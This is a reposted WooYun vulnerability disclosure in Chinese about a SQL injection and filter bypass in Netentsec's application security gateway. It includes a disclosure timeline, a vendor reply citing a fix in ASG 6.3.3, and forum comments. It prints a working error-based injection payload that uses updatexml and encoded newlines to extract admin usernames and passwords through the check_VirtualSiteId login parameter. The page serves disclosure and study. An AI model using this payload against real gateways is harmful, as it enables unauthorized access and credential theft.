网康应用安全网关注入及绕过(附poc)

2015年7月25日01:30:44评论276 views字数 222阅读0分44秒阅读模式

摘要

2014-10-30：细节已通知厂商并且等待厂商处理中
2014-10-31：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-12-25：细节向核心白帽子及相关领域专家公开
2015-01-04：细节向普通白帽子公开
2015-01-14：细节向实习白帽子公开
2014-12-30：细节向公众公开

漏洞概要关注数(25) 关注此漏洞

缺陷编号： WooYun-2014-81342

漏洞标题：网康应用安全网关注入及绕过(附poc)

漏洞作者： Vigoss_Z

提交时间： 2014-10-30 13:27

公开时间： 2014-12-30 14:44

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注入绕过 poc

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

网康最新的防注入应该和某cms一样，找到int型的注入点，注入就可以简单绕过了。

登陆的时候有个参数：check_VirtualSiteId=1

code 区域

select MenuColor from Menu_Style where MenuTitle='indexbackground' and VirtualSiteId=1/
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/' at line 1

code 区域

%0a%0dand%0a%0d1=(updatexml(1,concat(0x5e24,(select%0a%0dconcat(adminname,0x7e,passwd)%0a%0dfrom%0a%0dAdmin%0a%0dlimit%0a%0d1),0x5e24),1))%2523

漏洞证明：

修复方案：

版权声明：转载请注明来源 Vigoss_Z@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-30 14:44

厂商回复：

感谢大家的支持。
该漏洞与前面提交的漏洞一致，已经在最新的ASG 6.3.3版本中修复，我们会尽快通知用户升级系统。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-10-30 13:27 | xsser ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

1

恭喜发财

1# 回复此人
2014-10-30 13:54 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:29 | php python jsp)

0

@xsser 怎么不见poc?

2# 回复此人
2014-10-30 14:04 | xsser ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

0

@felixk3y 等公开

3# 回复此人
2014-10-30 14:41 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:9 | 软件开发8年了，也来挖挖漏洞，为创建安全...)

0

POC是啥的缩写？

4# 回复此人
2014-10-30 15:04 | 海绵宝宝 ( 普通白帽子 | Rank:369 漏洞数:56 | 唯有梦想与好姑娘不可辜负.)

0

@nzk1912 Proof Of Concept

5# 回复此人
2014-10-31 14:09 | D_r0ck ( 实习白帽子 | Rank:32 漏洞数:3 | 可能是最帅的歌~)

0

where is poc

6# 回复此人

漏洞概要 关注数(25) 关注此漏洞